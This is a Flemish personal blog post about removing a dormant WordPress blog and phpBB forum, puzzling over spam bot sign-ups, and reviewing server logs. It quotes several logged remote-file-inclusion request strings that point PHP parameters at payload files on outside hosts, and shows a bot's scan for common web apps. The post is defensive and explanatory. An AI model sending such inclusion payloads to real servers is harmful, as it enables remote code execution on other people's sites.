Sieberkev's Blog

Ik ben een mens met veel intentie om iets te beginnen en (vooral proberen) te onderhouden, maar na verloop van tijd belanden mijn goeie voornemens toch maar in een lade waar al veel stof in ligt.
Zo ook geschiedde met mijn exen "Wordpress Blog" en "phpBB Forum" op mijn persoonlijke website Cyberkef.be.

Vannacht heb ik es de stofzuiger bovengehaald om non-actieve zaken te exterminaten, en bij de opruiming kwam ik toch een paar.... intressante zaken tegen.

The Wordpress Blog

Ik durf mij bij momenten zwaar te intresseren in blogjes over technische zaken van software waarmee ik veel werk (bvb de developmentblog van vBulletin). Nadat ik bij mijn collega Epyon gezien had dat hij zich ook wel goed amuseert met blogjes, vond ik dat ik daar ook maar es aan moest beginnen. Helaas pindakaas, uiteindelijk komt het er toch nooit van om mijn intressante webavonturen neer te pennen

Wordpress vind ik een leuk stukje websoftware, updaten gaat als een fluitje van een cent, het beheren is een lachertje, ... maar helaas, net als elk populair websoftwarepakket ook het slachtoffer van geautomatiseerde spamprogramma's (vanaf hier gewoon Bots genoemd).

Elke week kreeg ik wel een mail in mijn box dat een of andere obscure website waaronder "gogole.com" (nice try google phising, hmhm) trackbacks stuurt. Niets vreemds tho (zelfs een beetje offtopic in de context van deze blog), maar een toevallige bezoeker van mijn site zou er maar es op moeten doorklikken.

Waar ik wel voor in mijn haar krab zijn registraties van gebruikers met nietszeggende usernames (genre "exhauncquiece") met een gmail adres (tiens, gingen die niet spamuserproof zijn?) die uiteindelijk toch niets doen. Waarom dan al de moeite doen om een account te registreren?

Waarschijnlijk een onwetende besmette computer (Zombie) of een mishandelde server die de opdracht heeft om te scannen naar sites met die software en bepaalde code uit te voeren.

Het nut ervan echter, registeren en uiteindelijk niets doen? Beats me. Misschien wachten op een signaal waardoor ze dan allemaal in één keer beginnen spammen, aka het 1 april virus?

Soit, laatste blogentry was toch van paar maand terug, files en database tables werden ondertussen al naar de prullenbak verplaatst.

The phpBB Forum

Een gratis en populair stuk websoftware om snel een forum te deployen en feedback te vragen of discussies op te voeren. Helaas ook het slachtoffer van zen eigen succes en men mag dus verwachten dat voor phpBB al bijbels vol autoregistratiescripts geschreven zijn.

Na een paar maand afwezigheid van aandacht en activiteit van mijzelf ontdekte ik dat er ondertussen al een slordig aantal van 660 registraties gebeurd waren. En niet zomaar registraties, maar mooi met avatar, geïntresseerd in de zaken waarvoor ze waarschijnlijk kwamen spammen, geactiveerde gmail adressen, CAPTCHA mooi voorbijgegaan, usernames uit woordenboeken, ... maar ze doen NIETS. Registreren en daarna zelfs niet eens meer op bezoek komen. Geen spamposts, geen spammails, geen spampm's, geen activity... Nut? Who knows! Ik niet alleszins.

Ook men phpbb forum werd ondertussen hetzelfde lot beschoren als men blog, prullenbak it is.

The Site

Uiteindelijk, na het opruimen van nog een paar ongebruikte maar kleinere stukjes site, kwam ik aan bij mijn stiekeme logviewer. Elke pageview wordt namelijk in een mysql tabel gestopt samen met wat gedetaileerde informatie van de bezoeker (gnigni, Big Cyberkef is watching you). Daaronder kwam ik toch wel een handjevol vreemde requestjes tegen... Een kleine bloemlezing:

• /index.php?p=http://www.geocities.com/tunis_23/idperkosa.txt?
• /index.php?module=ftp://wheelingboys.com.br:515151@wheelingboys.com.br/movie/index1.php?
• /?include_path=http://www.aerothaiunion.com/sik.txt?
• /index.php?module=vbulletin//admincp/auth/checklogin.php?cfgProgDir=http://www.europeytu.com/.httpaccess/roid.txt???
• //?site=http://www.bpmct.com/images/safe1.txt???

Een bot kan maar proberen hé! Stel je maar es voor dat iemand echt zo stom is om een include($_GET['module']) ofzo te zetten in zijn PHP code... Wel, dan kunnen ze via een andere site code uitvoeren op jouw server... laten we maar es denken aan honderdduizend spammails versturen, andere sites exploiten of DoS'en. Ge zet uw deur wagenwijd open.

Binnenkort de logger es uitbereiden met $_POST informatie, ben es benieuwd wat daaruit zal tevoorschijn komen...

The Server

En last but not least, de server error log. Ook zo'n schat van informatie indien je es wil zien hoeveel bots er wel niet rondstruinen op het wereld wijde webbetje, op zoek achter exploits in stukken populaire webprogramma's. Een stukje uit de log van één van mijn servers.

• [Fri Feb 01 15:41:05 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/adserver
• [Fri Feb 01 15:41:05 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/phpAdsNew
• [Fri Feb 01 15:41:06 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/phpadsnew
• [Fri Feb 01 15:41:06 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/phpads
• [Fri Feb 01 15:41:06 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/Ads
• [Fri Feb 01 15:41:06 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/ads
• [Fri Feb 01 15:41:06 2008] [error] [client 66.70.219.143] script 'C:/localhost/xmlrpc.php' not found or unable to stat
• [Fri Feb 01 15:41:07 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/xmlrpc
• [Fri Feb 01 15:41:07 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/xmlsrv
• [Fri Feb 01 15:41:07 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/blog
• [Fri Feb 01 15:41:07 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/drupal
• [Fri Feb 01 15:41:07 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/community
• [Fri Feb 01 15:41:08 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/blogs
• [Fri Feb 01 15:41:08 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/blogs
• [Fri Feb 01 15:41:08 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/blog
• [Fri Feb 01 15:41:08 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/blogtest
• [Fri Feb 01 15:41:09 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/b2
• [Fri Feb 01 15:41:09 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/b2evo
• [Fri Feb 01 15:41:09 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/wordpress
• [Fri Feb 01 15:41:09 2008] [error] [client 66.70.219.143] File does not exist: C:/localhost/phpgroupware

En indien je (on)chance hebt, vind je er ganse woordenboeken in van bots op zoek naar een succesvolle login, al een paar keer tegengekomen bij phpmyadmin om het root paswoord te raden. Geraken ze binnen en vinden ze een lijst vol emailadressen? Kassa kassa!

Je ziet jongens en meisjes, het internet is ondanks de pracht en praal, verre van veilig

Veilige paswoorden, deftige input sanitizing, logs analyseren ... het is zéker géén overbodige luxe.

En om af te sluiten nog even een blik werpen op CAPTCHA (het intypen van wat je in een random prentje te zien krijgt). t' Is en blijft een imo zwakke beveiliging, een drempel die uiteindelijk zo hoog komt te liggen dat je zelf als mens al zwaar in je haar zit te krabben. Er zijn al sites geweest waarvan ik dacht van: "fuck it, daar begin ik zelfs niet aan".
Wik en weeg het publiek van je site/forum, en indien je geluk hebt kan je een veel simpelere beveiliging vinden. Bij 9lives bvb moet je een (voor ons, Belgische mensen) doodsimpele vraag beantwoorden, iets waar het gemiddelde russische spamscript al véél meer moeite zal hebben dan een met OCR te kraken CAPTCHA.

En dan nog... uiteindelijk is het scripten van autoregistraties van spamaccounts zodanig gemakkelijk te automatiseren is (formfields invullen, mailserver checken, activatielinkjes bezoeken), dat je enkel een manier moet vinden om de CAPTCHA's te breken.
Wat vind je van een website waarbij je een CAPTCHA moet invullen om het volgende pornofilmpje gratis te kunnen bekijken? En in de achtergrond compleet je voor de serverbeheerder de registratie van een nieuwe spamaccount.

\V/